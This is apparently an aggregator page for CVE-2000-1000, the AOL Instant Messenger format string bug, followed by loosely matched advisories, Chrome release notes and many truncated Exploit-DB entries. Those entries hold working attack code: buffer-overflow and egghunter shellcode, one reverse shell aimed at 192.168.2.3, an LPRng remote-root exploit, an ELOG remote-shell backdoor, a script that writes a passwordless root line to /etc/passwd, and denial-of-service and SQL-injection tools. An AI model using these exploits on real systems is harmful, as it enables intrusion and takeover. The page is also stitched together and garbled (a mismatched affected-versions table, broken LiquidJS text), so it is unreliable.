CVE-2000-1000
Published 2000-12-11
Priority P418 · medium · 5 (CVSS 2.0) · AV:N/AC:L/Au:N/C:N/I:N/A:P
EPSS: 2.21% (80.4th percentile)
Format string vulnerability in AOL Instant Messenger (AIM) 4.1.2010 allows remote attackers to cause a denial of service and possibly execute arbitrary commands by transferring a file whose name includes format characters.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aol | instant_messenger | — | — |
| chrome_chrome | — | — | — |
| ws_project | ws | >= 5.0.0 < 5.2.3 | 5.2.3 |
| ws_project | ws | >= 6.0.0 < 6.2.2 | 6.2.2 |
| ws_project | ws | >= 7.0.0 < 7.4.6 | 7.4.6 |
GHSA
LiquidJS Vulnerable to ReDoS via Quadratic Backtracking in `strip_html` Filter Regex
ghsa·2026-05-27
CVE-2026-45617 [HIGH] CWE-1333 LiquidJS Vulnerable to ReDoS via Quadratic Backtracking in `strip_html` Filter Regex
## Summary
The built-in `strip_html` filter in liquidjs uses a regex containing four lazy-quantified alternatives. When the input contains many `|||/g, '')
The regex contains four lazy patterns:
1. ``
2. ``
3. ``
4. ``
For an input like `' {
for (const n of [1000, 2000, 4000, 8000, 16000]) {
const payload = ' {
const payload = ')[^|)[^|)[^-]*)*-->|]*>/g,
''
)
This unrolls each lazy quantifier so each ``, ``, comment, or generic tag, and emit nothing for those ranges.
Either fix should be combined with charging the regex output cost honestly to `memoryLimit` and (defensively) capping input length up front:
```ts
export function strip_html (this: FilterImpl, v: string) {
const str = stringify(
```
GHSA
GHSA-h2qf-prm2-vch5: Format string vulnerability in AOL Instant Messenger (AIM) 4
ghsa_unreviewed·2022-04-30
CVE-2000-1000 [MEDIUM] GHSA-h2qf-prm2-vch5: Format string vulnerability in AOL Instant Messenger (AIM) 4
Format string vulnerability in AOL Instant Messenger (AIM) 4.1.2010 allows remote attackers to cause a denial of service and possibly execute arbitrary commands by transferring a file whose name includes format characters.
GHSA
ReDoS in Sec-Websocket-Protocol header
ghsa·2021-05-28
CVE-2021-32640 [MEDIUM] CWE-345 ReDoS in Sec-Websocket-Protocol header
### Impact
A specially crafted value of the `Sec-Websocket-Protocol` header can be used to significantly slow down a ws server.
### Proof of concept
```js
for (const length of [1000, 2000, 4000, 8000, 16000, 32000]) {
const value = 'b' + ' '.repeat(length) + 'x';
const start = process.hrtime.bigint();
value.trim().split(/ *, */);
const end = process.hrtime.bigint();
console.log('length = %d, time = %f ns', length, end - start);
}
```
### Patches
The vulnerability was fixed in ws@7.4.6 (https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff) and backported to ws@6.2.2 (https://github.com/websockets/ws/commit/78c676d2a1acefbc05292e9f7ea0a9457704bf1b) and ws@5.2.3 (https://github.com/websockets/ws/commit/76d47c147900202
Chrome
Stable Channel Update for Desktop: CVE-2026-14024
vendor_chrome·2026-06-30
CVE-2026-14024 [MEDIUM] Stable Channel Update for Desktop: CVE-2026-14024
Stable Channel Update for Desktop
CVE-2026-14024: Use after free in Ozone. Reported by Google on 2026-05-30
[$2000][506482786] Low CVE-2026-14025: Use after free in Views. Reported by asjidkalam on 2026-04-26
[$1000][507263861] Low CVE-2026-14026: Incorrect security UI in SplitView
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2025-11211
vendor_chrome·2025-09-30·CVSS 7.5
CVE-2025-11211 [MEDIUM] Stable Channel Update for Desktop: CVE-2025-11211
Stable Channel Update for Desktop
CVE-2025-11211: Out of bounds read in Media. Reported by Kosir Jakob on 2025-08-29
[$2000][420734141] Medium CVE-2025-11212: Inappropriate implementation in Media. Reported by Ameen Basha M K on 2025-05-28
[$1000][443408317] Medium CVE-2025-11213: Inappropriate implementation in Omnibox
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2025-3067
vendor_chrome·2025-04-01·CVSS 8.6
CVE-2025-3067 [MEDIUM] Stable Channel Update for Desktop: CVE-2025-3067
Stable Channel Update for Desktop
CVE-2025-3067: Inappropriate implementation in Custom Tabs. Reported by Philipp Beer (TU Wien) on 2024-10-31
[$2000][401823929] Medium CVE-2025-3068: Inappropriate implementation in Intents. Reported by Simon Rawet on 2025-03-09
[$1000][40060076] Medium CVE-2025-3069: Inappropriate implementation in Extensions
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2024-7975
vendor_chrome·2024-08-21·CVSS 4.3
CVE-2024-7975 [MEDIUM] Stable Channel Update for Desktop: CVE-2024-7975
Stable Channel Update for Desktop
CVE-2024-7975: Inappropriate implementation in Permissions. Reported by Thomas Orlita on 2024-06-16
[$2000][339654392] Medium CVE-2024-7976: Inappropriate implementation in FedCM. Reported by Alesandro Ortiz on 2024-05-10
[$1000][324770940] Medium CVE-2024-7977: Insufficient data validation in Installer
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2024-3845
vendor_chrome·2024-04-16·CVSS 4.3
CVE-2024-3845 [LOW] Stable Channel Update for Desktop: CVE-2024-3845
Stable Channel Update for Desktop
CVE-2024-3845: Inappropriate implementation in Network. Reported by Daniel Baulig on 2024-02-03
[$2000][40064754] Low CVE-2024-3846: Inappropriate implementation in Prompts. Reported by Ahmed ElMasry on 2023-05-23
[$1000][328690293] Low CVE-2024-3847: Insufficient policy enforcement in WebUI
Severity: low
Chrome
Stable Channel Update for Desktop: CVE-2024-2629
vendor_chrome·2024-03-19·CVSS 4.3
CVE-2024-2629 [MEDIUM] Stable Channel Update for Desktop: CVE-2024-2629
Stable Channel Update for Desktop
CVE-2024-2629: Incorrect security UI in iOS. Reported by Muneaki Nishimura (nishimunea) on 2024-01-02
[$1000][41481877] Medium CVE-2024-2630: Inappropriate implementation in iOS. Reported by James Lee (@Windowsrcer) on 2023-12-07
[$2000][41495878] Low CVE-2024-2631: Inappropriate implementation in iOS
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2023-0702
vendor_chrome·2023-02-07·CVSS 8.8
CVE-2023-0702 [MEDIUM] Stable Channel Update for Desktop: CVE-2023-0702
Stable Channel Update for Desktop
CVE-2023-0702: Type Confusion in Data Transfer. Reported by Sri on 2022-04-14
[$1000][1405574] Medium CVE-2023-0703: Type Confusion in DevTools. Reported by raven at KunLun lab on 2023-01-07
[$2000][1385982] Low CVE-2023-0704: Insufficient policy enforcement in DevTools
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2023-0138
vendor_chrome·2023-01-10·CVSS 8.8
CVE-2023-0138 [LOW] Stable Channel Update for Desktop: CVE-2023-0138
Stable Channel Update for Desktop
CVE-2023-0138: Heap buffer overflow in libphonenumber. Reported by Michael Dau on 2022-07-23
[$2000][1367632] Low CVE-2023-0139: Insufficient validation of untrusted input in Downloads. Reported by Axel Chong on 2022-09-24
[$1000][1326788] Low CVE-2023-0140: Inappropriate implementation in File System API
Severity: low
Chrome
Stable Channel Update for Desktop: CVE-2022-1856
vendor_chrome·2022-05-24·CVSS 8.8
CVE-2022-1856 [HIGH] Stable Channel Update for Desktop: CVE-2022-1856
Stable Channel Update for Desktop
CVE-2022-1856: Use after free in User Education. Reported by Nan Wang(@eternalsakura13) and Guang Gong of 360 Alpha Lab on 2022-05-06
[$2000][1227995] High CVE-2022-1857: Insufficient policy enforcement in File System API. Reported by Daniel Rhea on 2021-07-11
[$1000][1314310] High CVE-2022-1858: Out of bounds read in DevTools
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2021-38017
vendor_chrome·2021-11-15·CVSS 8.8
CVE-2021-38017 [MEDIUM] Stable Channel Update for Desktop: CVE-2021-38017
Stable Channel Update for Desktop
CVE-2021-38017: Insufficient policy enforcement in iframe sandbox. Reported by NDevTK on 2021-10-05
[$2000][1197889] Medium CVE-2021-38018: Inappropriate implementation in navigation. Reported by Alesandro Ortiz on 2021-04-11
[$1000][1251179] Medium CVE-2021-38019: Insufficient policy enforcement in CORS
Severity: medium
No detection rules found.
Exploit-DB
VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
exploitdb·2019-08-12·CVSS 9.8
CVE-2019-12255 [CRITICAL] VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
---
# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
# Discovered By: Armis Security
# PoC Author: Zhou Yu (twitter: @504137480)
# Vendor Homepage: https://www.windriver.com
# Tested on: VxWorks 6.8
# CVE: CVE-2019-12255
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
from scapy.all import *
if __name__ == "__main__":
ip = "192.168.10.199"
dport = 23
seq_num = 1000
payload = "\x42"*2000
sport = random.randint(1024,65535)
syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
syn_ack = sr1(syn)
seq_num = seq_num + 1
ack_num = syn
Exploit-DB
Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities
exploitdb·2017-03-22
---
SEC Consult Vulnerability Lab Security Advisory
title: Multiple vulnerabilities
product: Solare Datensysteme GmbH
Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000
vulnerable version: Firmware 2.8.4-56 / 3.5.2-85
fixed version: Firmware 3.5.3-86
CVE number: -
impact: Critical
homepage: http://www.solar-log.com/de/home.html
found: 2017-01-23
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
Vendor description:
"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city
of Binsdorf and specialises in
Exploit-DB
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
exploitdb·2009-08-24
CVE-2009-0490 Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
---
#!/usr/bin/env python
#
# Audacity
print " [+] Creating eviL .gro file..."
buff = ("\x44" * 174)
buff += ("\xEB\x08\x90\x90")
buff += ("\x22\x23\x17\x01")
buff += "\x90"* 4
buff += ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x57\x30\x30\x54" # this is the egg...
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buff += ("\xCC" * 1000);
buff += "W00TW00T"
# Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space)
buff += ("\x89\xe5\xd9\xc3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4
Exploit-DB
Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
exploitdb·2009-02-02
CVE-2009-1808 Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
---
// source: https://www.securityfocus.com/bid/35120/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
#include <windows.h>   /* SystemParametersInfo, WCHAR, PVOID (header name was lost in extraction) */
#include <string.h>    /* memset */
int main()
{
    WCHAR c[1000] = {0};
    memset(c, 'c', 1000);   /* fills the first 1000 bytes (half of the 2000-byte WCHAR buffer), as in the original PoC */
    SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);
    WCHAR b[1000] = {0};
    SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);   /* read the oversized value back */
    return 0;
}
Exploit-DB
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
exploitdb·2007-07-18
CVE-2007-3764 Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
Asterisk
#include
#include
#include
#include
#include
#include
#include
#include
#define SKINNY_TCP_PORT 2000
#define CLEN 1024
#define SKINNY_MAX_SIZE 1000
#define REGISTER_MESSAGE 0x0001
struct register_message {
char name[16];
uint32_t userId;
uint32_t instance;
uint32_t ip;
uint32_t type;
uint32_t maxStreams;
};
struct skinny_client {
int sd;
struct sockaddr_in saddr;
int active;
char rhost[CLEN];
char username[CLEN];
char password[CLEN];
char packet[SKINNY_MAX_SIZE];
};
struct skinny_client_message {
int len;
int res;
int e; /* 12 bytes */
char *data;
};
struct skinny_client *g_sc;
struct messages {
int e;
char *human;
int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm);
} message_list[] = {
{0x81,"Register Ack Message\n", NULL},
{0x9b,"Capabil
Exploit-DB
Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
exploitdb·2007-05-23
CVE-2007-2903 Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
---
2007/05/23
Microsoft Office 2000 Controllo UA di Microsoft Office (OUACTRL.OCX v. 1.0.1.9) "HelpPopup" method Remote Buffer Overflow
and winhlp32.exe Denial of Service (hey, don't you think this is a very long title :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
control is set as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Sub tryMe()
buff = String(1000, "a")
test.HelpPopup buff, "default"
End Sub
Registers content:
EAX 00000000
ECX 7E39EC0C USER32.7E39EC0C
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 38CFD2D0 OUACTRL.38CFD2D0
ESP 01D0F434 UNICODE "aaaa..."
EBP 00610061
ESI 02ACC86C
EDI 00000000
EIP 00610061
# milw0rm.com [2007-05-23]
Exploit-DB
PHP-Nuke Module Emporium 2.3.0 - SQL Injection
exploitdb·2007-02-19
CVE-2007-1034 PHP-Nuke Module Emporium 2.3.0 - SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If islem
Exploit-DB
LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
exploitdb·2007-02-08
CVE-2007-0904 LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If
Exploit-DB
LushiWarPlaner 1.0 - 'register.php' SQL Injection
exploitdb·2007-02-08
CVE-2007-0864 LushiWarPlaner 1.0 - 'register.php' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If isl
Exploit-DB
LushiNews 1.01 - 'comments.php' SQL Injection
exploitdb·2007-02-08
CVE-2007-0865 LushiNews 1.01 - 'comments.php' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If islem =
Exploit-DB
PHP League 0.82 - 'classement.php' SQL Injection
exploitdb·2006-10-27
CVE-2006-5676 PHP League 0.82 - 'classement.php' SQL Injection
---
exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
Php League v0.82 (classement.php) Remote SQL Injection Exploit
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
Php Leaguev0.82 (classement.p
Exploit-DB
ELOG 2.5.6 - Remote Shell
exploitdb·2005-02-09
CVE-2005-0439 ELOG 2.5.6 - Remote Shell
---
/* Worked on latest version for me
* http://midas.psi.ch/elog/download/tar/elog-latest.tar.gz
* elog-latest.tar.gz 26-Jan-2005 21:36 519K
* Default port 8080.
* str0ke */
/*
Hi there, someone has brought to u a gift.
ELOG Remote Shell Exploit
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define _GNU_SOURCE
#define CONTSIZE 10000
#define BOUNSIZE 100
#define REQUESTSIZE 2000
#define INBUF 5000
#define LINEBUFSIZ 1000
#define GETBUFSIZE 10000
#define SENDBUFSIZE 10000
#define TIMEOUT 30
#define ENURLSIZE 200
#define GLOBATTSIZE 200
#define STORESIZE 10000
#define ELOGPORT 8080
#define SHBUFSIZE 288
#define BIGBUFSIZE 5000
#define BACKDOOR 31337
#define BSDBAC
Exploit-DB
Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
exploitdb·2004-08-11
CVE-2004-1714 Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
---
source: https://www.securityfocus.com/bid/10915/info
It is reported that BlackICE PC Protection is prone to a local buffer overrun when handling excessive input in certain configuration directives parsed from the firewall.ini file included with the software.
It is reported that when the system is restarted, and the affected software reads the malicious firewall.ini file both the blackice.exe and blackd.exe executables will crash.
REJECT, 138, default, 1999-07-22 20:26:53, AAAAAAAAAAAAAAAAA.... , 2000,
unknown
(Aprox 1000 A's)
Exploit-DB
LPRng 3.6.22/23/24 - Remote Command Execution
exploitdb·2000-12-11
CVE-2000-0917 LPRng 3.6.22/23/24 - Remote Command Execution
---
/*
* LPRng remote root exploit for x86 Linux
* 9/27/00
*
* - sk8
* tested on compiled LPRng 3.6.22/23/24
*
*/
#include
#include
char sc[]=
"\x29\xdb\x29\xc0\x29\xd2\x31\xc9\xfe\xca\xb0\x46\xcd\x80\x29\xff"
"\x47\x47\x47\x43\x43\x43\x31\xc9\x29\xc0\xb0\x3f\xcd\x80\x41\x39"
"\xf9\x75\xf5\x39\xd3\x7e\xee\xeb\x19\x5e\x89\xf3\x89\xf7\x83\xc7"
"\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x0b"
"\xcd\x80\xe8\xe2\xff\xff\xff/bin/sh";
#define NOP 0x90 //will be split up, doesn't matter
int main(int argc, char** argv) {
char getbuf[1000];
int bpad=0; /* was 2 */ /* 3 for other */
/* 2 - -34
3 - -41
0 - -42
*/
int i=0;
int eiploc=0x41424344;
char buffer[1024];
char fmtbuf[128];
int shloc=-1; //0xbffff2c8;
int hi=100;
int lo=200;
i
Exploit-DB
PragmaSys TelnetServer 2000 - rexec Buffer Overflow
exploitdb·2000-08-24
CVE-2000-1002 PragmaSys TelnetServer 2000 - rexec Buffer Overflow
---
source: https://www.securityfocus.com/bid/1605/info
Pragma Systems offers a Windows remote access server called TelnetServer 2000. TelnetServer crashes if more than 1000 NULL characters are sent to its rexec port, 512. This can be executed by an anonymous attacker from anywhere on the Internet. It is not known whether this apparent overflow can be exploited to gain access on the victim host.
#!/usr/bin/perl
#########################################################
# Exploit by USSRLabs www.ussrback.com
# send 5k of null causes the server to crash.
#########################################################
#
# ./$0.pl -s -p
#
# Null request DoS
#
use Getopt::Std;
use Socket;
getopts('s:p', \%args);
if(!defined($args{s})){&usage;}
Exploit-DB
BeOS 5.0 - TCP Fragmentation Remote Denial of Service
exploitdb·2000-05-18
CVE-2000-0463 BeOS 5.0 - TCP Fragmentation Remote Denial of Service
---
source: https://www.securityfocus.com/bid/1222/info
BeOS is vulnerable to a remote TCP fragmentation attack that will crash the target system, requiring a reboot.
[root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0
-I0 -T0 -u0 -t0
Compiled against Libnet 1.0.1b
Installing Signal Handlers.
Seeding with 31337
No Maximum traffic limiter
Using random source ports.
Using random destination ports.
Bad IP Version = 0% IP Opts Pcnt = 0%
Frag'd Pcnt = 100% Urg Pcnt = 0%
Bad TCP Cksm = 0% TCP Opts Pcnt = 0%
1000 @ 1802.8 pkts/sec and 1174.6 k/s
2000 @ 1636.8 pkts/sec and 1105.5 k/s
3000 @ 2110.2 pkts/sec and 1396.4 k/s
4000 @ 1689.1 pkts/sec and 1105.4 k/s
Caught signal 2
Used random seed 31337
Wrote 5002 pack
Exploit-DB
Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow
exploitdb·2000-03-16
CVE-2000-0239 Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow
---
source: https://www.securityfocus.com/bid/1056/info
WebView WebMail-Client is an add-on for the Mercur SMTP/POP3/IMAP4 Mail Server which allows a user to access email through a web browser.
Insufficient boundary checking exists in the code which handles GET requests, specifically on port 1080. Issuing a GET request containing a string of over 1000 characters on port 1080 will cause the WebView WebMail-Client application to crash.
eg.
http: //target/&mail_user=
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19810-1.exe
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19810-2.zip
Exploit-DB
Corel Linux OS 1.0 - Dosemu Distribution Configuration
exploitdb·2000-03-02
CVE-2000-0193 Corel Linux OS 1.0 - Dosemu Distribution Configuration
---
source: https://www.securityfocus.com/bid/1030/info
A vulnerability exists in the configuration of Dosemu, the DOS emulator, as shipped with Corel Linux 1.0. Dosemu documentation cautions that the system.com binary should not be made available to users, as it implements the system() libc call. Users can use this command to execute commands as root, and obtain elevated access to the system.
This "vulnerability" has been documented in the Dosemu documentation for a number of years.
Script started on Fri Feb 25 13:54:00 2000
nebula:~$ id
uid=1000(suid) gid=1000(suid) groups=1000(suid)
nebula:~$ cat > hack-corel
#!/bin/bash
echo "owned::0:0::/:/bin/bash" >> /etc/passwd
^D
nebula:~$ chmod a+rx hack-corel
nebula:~$ export PATH="$PAT
Exploit-DB
Microsoft Windows Media Services 4.0/4.1 - Handshake Sequence Denial of Service
exploitdb·2000-01-18
CVE-2000-0211 Microsoft Windows Media Services 4.0/4.1 - Handshake Sequence Denial of Service
---
// source: https://www.securityfocus.com/bid/1000/info
// Misordered handshake sequences sent to a Windows Media Unicast Server via Windows Media Player will cause the server to crash. Restarting the Unicast Service, including any open sessions during the time of the crash, is required in order to regain normal functionality. This is due to the dependency of the application on successfully completing asynchronous handshake requests in a proper sequential order between the client and the server.
/*
*
* Jan-18-2000
*
* [ http://www.rootshell.com/ ]
*
* Microsoft Media Server 4.1 - Denial of Service Attack
*
* This code will crash the Microsoft Media Unicast Server for
* Windows NT. We have tested this agai
Exploit-DB
AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow
exploitdb·1999-12-31
CVE-2000-0011 AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow
---
source: https://www.securityfocus.com/bid/906/info
The SimpleServer:WWW personal webserver package from AnalogX can be compromised due to an overflowable buffer. If a GET request longer than 1000 bytes is received, the software will crash and data from the request gets passed to the EIP, meaning that an exploit could be created to run arbitrary code.
DoS attack:
GET [1000 bytes] HTTP/1.1
Exploit-DB
Windowmaker wmmon 1.0 b2 - Command Execution
exploitdb·1999-12-22
CVE-2000-0018 Windowmaker wmmon 1.0 b2 - Command Execution
---
source: https://www.securityfocus.com/bid/885/info
WMMon is a multiple platform Window Maker docking application. It monitors useful system information such as CPU load and disk activity. The application also allows the user to define commands that can be launched by mouse clicks in the WMMon window. If the WMMon application is installed SUID or SGID, these privileges are not dropped before executing commands that have been defined by the user. Since the user can configure the application to execute any command, a user can run a shell or any other executable with the privileges that WMMon has been installed with. The FreeBSD ports version of WMMon installs SGID kmem and older versions installed it as SUID root.
Exploit:
% id
uid=1000(ste
No writeups or analysis indexed.
Published: 2000-12-11